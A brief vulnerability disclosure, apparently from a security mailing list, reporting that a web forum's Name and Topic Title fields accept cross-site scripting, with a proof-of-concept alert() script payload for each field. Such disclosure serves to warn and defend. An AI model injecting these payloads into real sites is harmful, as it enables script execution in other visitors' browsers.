It's possibile to inject XSS script in the Name box and in the Topic Title 
box.

For example try this:

Name: &lt;script&gt;alert(Zone-h1)&lt;/script&gt;

Email address: test@...t.com

Topic title: &lt;script&gt;alert(Zone-h)&lt;/script&gt;

Message: www.Zone-h.org
